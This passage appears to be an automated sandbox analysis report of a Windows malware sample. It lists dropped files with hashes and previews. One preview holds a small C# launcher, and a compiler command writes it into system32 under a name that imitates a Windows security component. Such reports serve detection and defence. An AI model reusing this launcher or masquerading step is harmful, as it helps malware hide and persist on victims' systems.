                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\a4716c5db9108b

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with very long lines (406), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):406
                                                                    Entropy (8bit):5.837973769961566
                                                                    Encrypted:false
                                                                    SSDEEP:6:wNxIJkOztHDWVKHZrvU7Cz2jXytlvf7SSehPCcTNc5zARKFSSiNEdLAR7JnpdF1x:wHIeOztjZZrMWz2qAlNaA04Ee79zv1rT
                                                                    MD5:773FB730726AF31C88942CC1CFB2ACA6
                                                                    SHA1:4DDD87B8FC7BD5DC75B1A9FBBDA806163DD9063B
                                                                    SHA-256:5BBEBFCBB39B5A81846225D8C9288D8DD33371F0077C17A37B6E03746B9438D2
                                                                    SHA-512:B6572C826243A5B5CD4A0E18BF7CEAF2C4C0A659D1ECB193088DFF943016206724F5C930EE3739510DF07B282E0581D455C07025C8570EF19EBB48FB1AC3DB92
                                                                    Malicious:false
                                                                    Preview:G6kq61AphUaIDHjMyCpqThYTh025xgNfSV9yk52Gkhe9r8PUmd2Q1NFihQIG9E1AG50sIum3KjFwDZljlhSUn7oEPbQUxvGgpd2wIhM219FSHTeIoifbvhWIQvcrdSFYciGkgzbDUaco2V666IpOQpvHGtfWFfYj3qzjM4lzHbGUErQ5yfuUm0Iwx9dwTE8zB3vLgXuChzHyjaDYckijuD6CiDvNaygCdQSL6FYavsxxsUNW5ETsfZE86sndmhlsTFVSH2cXLHyBQJTNzYRWexgDLUOOc5yNHEdn85PDm6hYkDsxYZnNPOOgiRGxnN4PTk4LppP4JNtiPIdImb0DSk8207FrybaYBREAJhHsKtEBfpQZy7LMX17smBUskhFrxUg8Dc9ETH3ig6XKqp21QN

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\EQdhBjQw4G.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:CSV text
                                                                    Category:modified
                                                                    Size (bytes):1306
                                                                    Entropy (8bit):5.353303787007226
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                                    MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                                    SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                                    SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                                    SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe.log

                                                                    Download File
                                                                    Process:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1510207563435464
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........

                                                                    C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.0.cs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                    Category:dropped
                                                                    Size (bytes):392
                                                                    Entropy (8bit):5.032773997772295
                                                                    Encrypted:false
                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKcRanaiFkD:JNVQIbSfhV7TiFkMSfhhRan7FkD
                                                                    MD5:BAF1B195C51F34C18B928B9A56C39040
                                                                    SHA1:691E994A2E992366BE7F51F513FDA888E6F6F2B7
                                                                    SHA-256:AC77D2ACD4C95B5516D7166BBCB9399510C05D610E9FEB3622882257A8B6AE4E
                                                                    SHA-512:54AB4E07598ECF987206D2DD295680DC1ACCE285EAA3099B805AEE3EAF4E3B349921C4693D7F5874B6CC105229EA8BFABEBFE789433E7B3948A28E1506DCFE0D
                                                                    Malicious:false
                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"); } catch { } }).Start();. }.}.

                                                                    C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):250
                                                                    Entropy (8bit):5.095888923417247
                                                                    Encrypted:false
                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f3DSlAn:Hu7L//TRq79cQWf7SGn
                                                                    MD5:98010AFFE09B9E8B415C11602CC72CAC
                                                                    SHA1:0E5DD1110B992162A9FD9BBDA805E542973DBA92
                                                                    SHA-256:7F739325F3D976CBBC0D3F46FAF9399DF74971F098F21AD91F55EF80EC52A490
                                                                    SHA-512:E8BAE5961FFB61F0ABC807DAB95398E714E16D0310BD0BD9533C929C7B6DFD37E23EE961D59B5C5660E6AC5B5FFDBD0A60AC95643B044F210727A7E9291038EC
                                                                    Malicious:true
                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.0.cs"

                                                                    C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.out

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):750
                                                                    Entropy (8bit):5.261085156197047
                                                                    Encrypted:false
                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWf7SGuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf7SHKax5DqBVKVrdFf
                                                                    MD5:AB149E164D2FC54439ED8CC13DFB2400
                                                                    SHA1:705744C366C1672E601EB38ABD1BCC617B42E006
                                                                    SHA-256:A9CE179B3AFFD55877F7B9C08E2A896748FCE682FC956A1807EA3CA9A7572C53
                                                                    SHA-512:B9438527C8972182D3FD4C2B534312A9A59CB222CE0B58B4E6B8540B6C16E2D3804DC9FA852AE70B6F4B782BDE455F6A0CEB1507A65A2C6D06CFC2F6129DFBCF
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                    C:\Users\user\AppData\Local\Temp\RES790E.tmp

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Wed Nov 6 03:38:03 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1952
                                                                    Entropy (8bit):4.5546710585422
                                                                    Encrypted:false
                                                                    SSDEEP:24:HpbW96XONjDfHKwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:S9BKhmMluOulajfqXSfbNtmh5Z
                                                                    MD5:164F64BB2C7FCE1545078C30B6F72176
                                                                    SHA1:1CFF3058F5E43128EB325A0CE057F412364FE6F2
                                                                    SHA-256:FB61A06997FD7C6F01CA4A6C735BBBDFFE18D82EE0DC82878D2DD00975CFEEEB
                                                                    SHA-512:7CB0E049A5601A1F17D3465601A066C54AC286FABE2774EE86DCF2C3C05849C583E4E255D6523E112C1FE17F08B48D5F5ACF4237390DB49B7118B003CCC54C91
                                                                    Malicious:false
                                                                    Preview:L.....*g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES790E.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                    C:\Users\user\AppData\Local\Temp\STUyh74ZFO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.403856189774723
                                                                    Encrypted:false
                                                                    SSDEEP:3:B3ZIS+i53n:Is53
                                                                    MD5:126549DC99D759414B612D84629C09AA
                                                                    SHA1:B22F474FD38BC083463E852B98F6027A7424E782
                                                                    SHA-256:F39122D33B3326A1690C80549C7BC754248B8A8DA1F76CD6D81D261759038CCE
                                                                    SHA-512:2617E34D38FD69AAC7277040B03FCB34EBC97BE3C2B19F06B74D5CA1C22CBADE3FFC3C4533B3FC7F89AFFFD32DBC9695AC0CD200007E453788B987B67E777B67
                                                                    Malicious:false
                                                                    Preview:u1iof7OsSkwQYGgCfrsdUZOlR

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0exf4clc.d03.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2w4aub4a.fk4.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hbcsven.zzy.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afiynciz.1ss.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfahwypd.zaw.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckcs4ddw.jky.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ducwmabx.feq.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbenq5ge.2of.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbccobm0.cyr.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iga0dyc1.bqq.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdmqaxd2.qjt.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfvn3eyv.tuz.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
